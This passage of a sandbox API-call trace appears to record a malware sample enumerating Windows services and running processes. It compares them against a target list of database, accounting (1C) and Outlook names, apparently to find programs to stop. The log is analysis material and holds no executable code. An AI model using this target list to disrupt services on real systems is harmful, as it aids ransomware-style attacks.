0xb90450 [0046.412] EnumServicesStatusExW (in: hSCManager=0xb90450, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0046.412] GetLastError () returned 0xea [0046.412] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xba5bf8 [0046.413] EnumServicesStatusExW (in: hSCManager=0xb90450, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xba5bf8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xba5bf8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0046.413] CloseServiceHandle (hSCObject=0xb90450) returned 1 [0046.413] lstrlenW (lpString="Appinfo") returned 7 [0046.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0046.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0046.414] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0046.414] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0046.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0046.414] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0046.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0046.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0046.414] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0046.414] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0046.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0046.414] lstrlenW (lpString="AudioSrv") returned 8 [0046.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0046.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0046.414] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0046.414] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0046.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0046.414] lstrlenW (lpString="BFE") returned 3 [0046.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0046.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0046.414] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0046.414] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0046.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0046.414] lstrlenW (lpString="CryptSvc") returned 8 [0046.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0046.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0046.414] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0046.414] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0046.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0046.414] lstrlenW (lpString="CscService") returned 10 [0046.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0046.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0046.414] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0046.414] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0046.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0046.415] lstrlenW (lpString="DcomLaunch") returned 10 [0046.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0046.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0046.415] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0046.415] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0046.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0046.415] lstrlenW (lpString="Dhcp") returned 4 [0046.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0046.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0046.415] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0046.415] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0046.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0046.415] lstrlenW (lpString="Dnscache") returned 8 [0046.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0046.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0046.415] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0046.415] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0046.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0046.415] lstrlenW (lpString="DPS") returned 3 [0046.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0046.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0046.415] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0046.415] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0046.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0046.415] lstrlenW (lpString="eventlog") returned 8 [0046.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0046.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0046.415] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0046.415] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0046.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0046.415] lstrlenW (lpString="EventSystem") returned 11 [0046.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0046.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0046.416] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0046.416] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0046.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0046.416] lstrlenW (lpString="gpsvc") returned 5 [0046.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0046.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0046.416] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0046.416] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0046.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0046.416] lstrlenW (lpString="iphlpsvc") returned 8 [0046.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0046.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0046.416] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0046.416] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0046.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0046.416] lstrlenW (lpString="LanmanServer") returned 12 [0046.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0046.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0046.416] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0046.416] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0046.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0046.416] lstrlenW (lpString="LanmanWorkstation") returned 17 [0046.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0046.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0046.416] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0046.416] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0046.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0046.416] lstrlenW (lpString="lmhosts") returned 7 [0046.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0046.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0046.416] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0046.416] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0046.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0046.417] lstrlenW (lpString="MMCSS") returned 5 [0046.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0046.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0046.417] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0046.417] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0046.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0046.417] lstrlenW (lpString="MpsSvc") returned 6 [0046.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0046.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0046.417] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0046.417] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0046.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0046.417] lstrlenW (lpString="Netman") returned 6 [0046.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0046.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0046.417] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0046.417] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0046.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0046.417] lstrlenW (lpString="netprofm") returned 8 [0046.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0046.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0046.417] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0046.417] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0046.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0046.417] lstrlenW (lpString="NlaSvc") returned 6 [0046.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0046.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0046.417] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0046.417] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0046.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0046.417] lstrlenW (lpString="nsi") returned 3 [0046.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0046.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0046.418] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0046.418] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0046.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0046.418] lstrlenW (lpString="PcaSvc") returned 6 [0046.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0046.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0046.418] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0046.418] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0046.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0046.418] lstrlenW (lpString="PlugPlay") returned 8 [0046.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0046.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0046.418] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0046.418] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0046.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0046.418] lstrlenW (lpString="Power") returned 5 [0046.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0046.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0046.418] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0046.418] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0046.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0046.418] lstrlenW (lpString="ProfSvc") returned 7 [0046.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0046.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0046.418] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0046.418] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0046.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0046.418] lstrlenW (lpString="RpcEptMapper") returned 12 [0046.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0046.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0046.418] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0046.418] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0046.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0046.419] lstrlenW (lpString="RpcSs") returned 5 [0046.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0046.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0046.419] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0046.419] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0046.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0046.419] lstrlenW (lpString="SamSs") returned 5 [0046.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0046.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0046.419] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0046.419] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0046.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0046.419] lstrlenW (lpString="Schedule") returned 8 [0046.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0046.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0046.419] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0046.419] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0046.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0046.419] lstrlenW (lpString="SENS") returned 4 [0046.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0046.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0046.419] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0046.419] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0046.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0046.419] lstrlenW (lpString="ShellHWDetection") returned 16 [0046.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0046.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0046.419] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0046.419] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0046.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0046.419] lstrlenW (lpString="Spooler") returned 7 [0046.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0046.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0046.420] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0046.420] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0046.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0046.420] lstrlenW (lpString="swprv") returned 5 [0046.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0046.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0046.420] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0046.420] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0046.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0046.420] lstrlenW (lpString="SysMain") returned 7 [0046.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0046.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0046.420] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0046.420] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0046.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0046.420] lstrlenW (lpString="Themes") returned 6 [0046.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0046.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0046.420] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0046.420] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0046.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0046.420] lstrlenW (lpString="TrkWks") returned 6 [0046.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0046.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0046.420] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0046.420] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0046.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0046.420] lstrlenW (lpString="UxSms") returned 5 [0046.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0046.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0046.420] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0046.420] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0046.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0046.421] lstrlenW (lpString="VSS") returned 3 [0046.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0046.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0046.421] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0046.421] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0046.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0046.421] lstrlenW (lpString="WdiServiceHost") returned 14 [0046.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0046.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0046.421] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0046.421] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0046.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0046.421] lstrlenW (lpString="WdiSystemHost") returned 13 [0046.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0046.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0046.421] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0046.421] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0046.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0046.421] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0046.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0046.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0046.421] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0046.421] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0046.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0046.421] lstrlenW (lpString="Winmgmt") returned 7 [0046.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0046.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0046.421] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0046.421] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0046.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0046.421] lstrlenW (lpString="WPDBusEnum") returned 10 [0046.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0046.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0046.421] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0046.422] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0046.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0046.422] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xba5bf8 | out: hHeap=0xb10000) returned 1 [0046.422] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b4 [0046.424] Process32FirstW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0046.425] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0046.426] lstrlenW (lpString="System") returned 6 [0046.426] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0046.426] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0046.426] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0046.426] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0046.426] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0046.426] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0046.426] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0046.426] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0046.427] lstrlenW (lpString="smss.exe") returned 8 [0046.427] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0046.427] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0046.427] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0046.427] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0046.427] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0046.427] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0046.427] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0046.427] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0046.428] lstrlenW (lpString="csrss.exe") returned 9 [0046.428] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0046.428] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0046.428] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0046.428] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0046.428] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0046.428] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0046.428] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0046.429] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0046.429] lstrlenW (lpString="wininit.exe") returned 11 [0046.429] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0046.429] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0046.429] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0046.429] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0046.430] lstrlenW (lpString="csrss.exe") returned 9 [0046.430] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, 